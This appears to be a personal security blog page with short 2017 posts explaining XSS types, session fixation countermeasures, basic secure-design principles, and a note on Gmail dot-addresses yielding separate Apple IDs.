Random things – session hijacking

Written on 18 March 2017, 11:53am

Tagged with: , ,

Two notes about session hijacking methods:

Difference between stored and reflected XSS attack

Stored or persistent XSS attack – relies on user input stored on the server. Best example – a comment in a news site.
Reflected or non-persistent XSS attack – relies on user input sent in the HTTP query parameters. Best example – site search, showing the keyword after search
Play the XSS game: xss-game.appspot.com

Session fixation

In a nutshell, session fixation means that the attacker obtains a legitimate session ID from the server and then it makes the victim browser to use it. See example.
The counter-measures are quite simple:
– do not accept setting a session id via URL/POST parameters
– change session id after user login
– just use HTTPS and secure cookies, it’s 2017 and HTTPS adoption reached the tipping point

Security concepts #2

Written on 29 January 2017, 09:40pm

Tagged with: ,

Functional requirements – what a system must do.
Non functional requirements – how the system must behave. On top of performance, usability, maintanability -> security.
CIA – Confidentiality (Privacy), Integrity, Availability + non-repudiation

Attacker levels

kid-level: unskilled, opportunistic, bragging rights
malware/ransomware: automated, opportunistic, financial gain
professional attacker: highly skilled, resources, persistent, adapt to their targets
nation state level: best skills available, big resources, goals – aligned with the country military/geo-strategic objectives

Vulnerability / exposure / security incident

Vulnerability types: bugs and flaws. Bugs – defects in the development process; could be detected by automated tools. Flaws – defects in the design process; could not be detected by automated tools.
A vulnerability does not necessarily cause an impact. It needs 2 more steps:
Exposure: if the vulnerability becomes known to an attacker
Security incident: if the attacker takes advantage of the exposure to perform an attack

Vulnerability assessment: black box vs white box testing
Black box – no access to the source code, hosting environment, etc
White box – full access to the source code, hosting, etc

Some principles:

– minimize the attack area
– secure defaults (coding and configuration)
– fail securely (defensive coding)
– give least privilege (need to know)
– multiple layers (ex. encrypted USB key, in a locked safe)
– no security by obscurity
– keep the design simple

Identification, Authentication, Authorization

Identification – who are you?
Authentication – how can you prove who you are?
Authorization – what can you do once authenticated?

Some specifics

– don’t say why the authentication failed (‘wrong username’ -> enumeration, ‘wrong password’ -> brute force attack)
– do not change data on the server via a HTTP GET request
– allow pasting passwords
– do not make the “Log out” option difficult to find
– just use HTTPS

Distinct Apple IDs for the same GMail account

Written on 28 January 2017, 02:45pm

Tagged with: , ,

It’s probably well known by now the fact that when you create a GMail account, any periods (dot characters) in your username will be ignored by GMail:

If you have a personal account (typically ending in gmail.com), it doesn’t matter if people type the period in your username or not.
For example, emails to all of these addresses will be delivered to the same Gmail account:
johnsmith@gmail.com
jo.hn.smith@gmail.com
john.smith@gmail.com
https://support.google.com/mail/answer/10313?hl=en

What is the impact of this feature on the creation of new Apple IDs?
Well, for Apple the 3 email addresses above are distinct, so they will allow to create 3 separate Apple IDs with the 3 email addresses. During the Apple ID registration process, an email with the subject Verify your Apple ID email address will be sent to confirm the ownership of the email address. Naturally, in all the 3 cases above, the 3 emails will be delivered to the same GMail account.

This is already a bit awkward, but I guess it’s something that does not create any problems, so Apple had no reason to work around it.
The real problem is described below.
(more…)